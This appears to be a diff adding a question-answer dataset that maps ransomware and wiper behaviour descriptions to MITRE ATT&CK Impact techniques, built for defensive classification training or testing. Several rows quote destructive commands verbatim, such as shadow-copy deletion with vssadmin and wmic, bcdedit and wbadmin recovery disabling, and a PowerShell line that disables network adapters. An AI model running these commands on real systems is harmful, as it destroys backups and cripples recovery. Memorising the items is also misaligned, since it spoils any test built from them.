+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites.","Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StoneDrill has a disk wiper module that targets files other than those in the Windows directory.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can corrupt files by overwriting the first 1 MB with `0xcc` and appending random extensions.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash has destroyed Linux-based databases as part of its ransomware capabilities.,"Tecnique: T1485 Data Destruction, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used Conti ransomware to encrypt a compromised network.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used Hermes ransomware to encrypt files with AES256.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira encrypts files in victim environments as part of ransomware operations.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has encrypted virtual disk volumes on ESXi servers using a version of Darkside ransomware.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has deployed ransomware such as Ragnar Locker, White Rabbit, and attempted to execute Noberus on compromised networks.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has encrypted domain-controlled systems using BitPaymer.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used BitLocker and DiskCryptor to encrypt targeted workstations.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used Prestige ransomware to encrypt data at targeted organizations in transportation and related logistics industries in Ukraine and Poland.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has used BlackCat ransomware to encrypt files on VMWare ESXi servers.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira encrypts victim filesystems for financial extortion purposes.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon encrypts the victim system using a combination of AES256 and RSA encryption schemes.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has encrypted files and network resources using AES-256 and added an `.avos`, `.avos2`, or `.AvosLinux` extension to filenames.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk can use ChaCha8 and ECDH to encrypt data.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has encrypted files and disks using AES-128-CBC and RSA-2048.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending .locked to the filename.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can encrypt files with the ChaCha20 cypher and using a multithreaded process to increase speed.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat has the ability to encrypt Windows devices, Linux devices, and VMWare instances.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cheerscrypt can encrypt data on victim machines using a Sosemanuk stream cipher with an Elliptic-curve Diffie–Hellman (ECDH) generated key.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can encrypt files using AES, RSA, and RC4 and will add the "".clop"" extension to encrypted files.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can use CreateIoCompletionPort(), PostQueuedCompletionStatus(), and GetQueuedCompletionPort() to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. Conti can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has the ability to encrypt system data and add the "".cuba"" extension to encrypted files.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv has encrypted drives using the core encryption mechanism from DiskCryptor.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate can deploy follow-on ransomware payloads.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has encrypted files using an RSA key though the `CryptEncrypt` API and has appended filenames with "".lock64"".","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS uses standard encryption library functions to encrypt files.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIVEHANDS can use an embedded NTRU public key to encrypt data for ransom.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HELLOKITTY can use an embedded RSA-2048 public key to encrypt victim data for ransom.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JCry has encrypted files and demanded Bitcoin to decrypt those files.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk has a ransomware component that encrypts files with an AES key that is also RSA-1028 encrypted.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LockerGoga has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. Maze has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can encrypt files on infected machines to extort victims.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya encrypts user files and disk structures like the MBR with 2048-bit RSA.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige has leveraged the CryptoPP C++ library to encrypt files on target systems using AES and appended filenames with `.enc`.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can encrypt files on victim systems and demands a ransom to decrypt the files.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal uses a multi-threaded encryption process that can partially encrypt targeted files with the OpenSSL library and the AES256 algorithm.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seth-Locker can encrypt files on a targeted system, appending them with the suffix .seth.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon has an operational mode for encrypting data instead of overwriting it.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck encrypts the victims machine followed by asking the victim to pay a ransom.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can encrypt data and leave a ransom note.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET performs AES-CBC encryption on files under ~/Documents, ~/Downloads, and
+~/Desktop with a fixed key and renames files to give them a .enc extension. Only files with sizes
+less than 500MB are encrypted.","Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.,"Tecnique: T1486 Data Encrypted for Impact, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used PsExec to stop services prior to the execution of ransomware.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LAPSUS$ has shut down virtual machines from within a victim's on-premise VMware ESXi infrastructure.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.","Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon looks for and attempts to stop database processes.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has terminated specific processes before encryption.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk can stop specific services related to backups.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat has the ability to stop VM services on compromised networks.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cheerscrypt has the ability to terminate VM processes on compromised hosts through execution of `esxcli vm process kill`.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can kill several processes and services related to backups and security solutions.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of net stop.","Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has a hardcoded list of services and processes to terminate.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol will terminate services using the Service Control Manager (SCM) API.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS stops database, data backup solution, antivirus, and ICS-related processes.","Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to stop the Volume Shadow Copy service.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has the ability to stop services on the infected host.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer’s data wiper module writes zeros into the registry keys in SYSTEM\CurrentControlSet\Services to render a system inoperable.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KillDisk terminates various processes to get the user to reboot the victim machine.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack can kill processes and delete services.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has stopped SQL services to ensure it can encrypt any database.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex can stop and disable services on the system.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can disconnect all network adapters on a compromised host using `powershell -Command ""Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }"" > NUL`.","Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can terminate system processes and services, some of which relate to backup software.","Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer uses the API call ChangeServiceConfigW to disable all services on the affected system.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige has attempted to stop the MSSQL Windows service to ensure successful encryption using `C:\Windows\System32\net.exe stop MSSQLSERVER`.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa can stop services and processes.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil has the capability to stop services and kill processes.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RobbinHood stops 181 Windows services on the system before beginning the encryption process.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can use `RmShutDown` to kill applications and services using the resources that are targeted for encryption.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has called kill.bat for stopping services, disabling services and killing processes.","Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has the capability to stop processes and services.,"Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.","Tecnique: T1489 Service Stop, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used WMIC and vssadmin to manually delete volume shadow copies. Wizard Spider has also used Conti ransomware to delete volume shadow copies automatically with the use of vssadmin.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira will delete system volume shadow copies via PowerShell commands.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon deletes backups and shadow copies using native system tools.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Babuk has the ability to delete shadow volumes using vssadmin.exe delete shadows /all /quiet.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer attempts to remove the backup shadow files from the host using vssadmin.exe Delete Shadows /All /Quiet.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can delete shadow copies using vssadmin.exe.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can delete shadow copies using `vssadmin.exe delete shadows /all /quiet` and `wmic.exe Shadowcopy Delete`; it can also modify the boot loader using `bcdedit /set {default} recoveryenabled No`.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clop can delete the shadow volumes with vssadmin Delete Shadows /all /quiet and can use bcdedit to disable recovery options.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker resets system restore points and deletes backup files.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can delete Windows Volume Shadow Copies using vssadmin.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DEATHRANSOM can delete volume shadow copies on compromised hosts.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate can delete system restore points through the command cmd.exe /c vssadmin delete shadows /for=c: /all /quiet”.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can delete shadow volumes using vssadmin.exe.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol can delete shadow copies using the `IVssBackupComponents` COM object to call the `DeleteSnapshots` method.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIVEHANDS has the ability to delete volume shadow copies on compromised hosts.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: H1N1 disable recovery options and deletes shadow copies from the victim.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HELLOKITTY can delete volume shadow copies on compromised hosts.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can disable the VSS service on a compromised host using the service control manager.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can can remove all system restore points.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JCry has been observed deleting shadow copies to ensure that data cannot be restored easily.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.","Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has deleted volume shadow copies using vssadmin.exe.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows /all /quiet` and `C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete`.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Netwalker can delete the infected system's Shadow Volumes to prevent recovery.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer uses the native Windows utilities vssadmin, wbadmin, and bcdedit to delete and disable operating system recovery features such as the Windows backup catalog and Windows Automatic Repair.","Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige can delete the backup catalog from the target system using: `c:\Windows\System32\wbadmin.exe delete catalog -quiet` and can also delete volume shadow copies using: `\Windows\System32\vssadmin.exe delete shadows /all /quiet`.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ProLock can use vssadmin.exe to remove volume shadow copies.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has the functionality to delete shadow copies.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker can delete volume shadow copies using vssadmin delete shadows /all /quiet.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can delete shadow copy backups with vssadmin.exe using the command `delete shadows /all /quiet`.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has used vssadmin Delete Shadows /all /quiet to to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry uses vssadmin, wbadmin, bcdedit, and wmic to delete and disable operating system recovery features.","Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker can delete shadow volumes.,"Tecnique: T1490 Inhibit System Recovery, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has left taunting images and messages on the victims' desktops as proof of system access.,"Tecnique: T1491.001 Defacement: Internal Defacement, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group replaced the background wallpaper of systems with a threatening image after rendering the system unbootable with a Disk Structure Wipe.,"Tecnique: T1491.001 Defacement: Internal Defacement, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta has set the desktop wallpaper on victims' machines to display a ransom note.,"Tecnique: T1491.001 Defacement: Internal Defacement, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackCat can change the desktop wallpaper on compromised hosts.,"Tecnique: T1491.001 Defacement: Internal Defacement, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After encryption, Diavol will capture the desktop background window, set the background color to black, and change the desktop wallpaper to a newly created bitmap image with the text “All your files are encrypted! For more information see “README-FOR-DECRYPT.txt"".","Tecnique: T1491.001 Defacement: Internal Defacement, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can change both the desktop wallpaper and the lock screen image to a custom image.,"Tecnique: T1491.001 Defacement: Internal Defacement, Tactic: TA0040 Impact"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.","Tecnique: T1491.002 Defacement: External Defacement, Tactic: TA0040 Impact"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.,"Tecnique: T1495 Firmware Corruption, Tactic: TA0040 Impact"
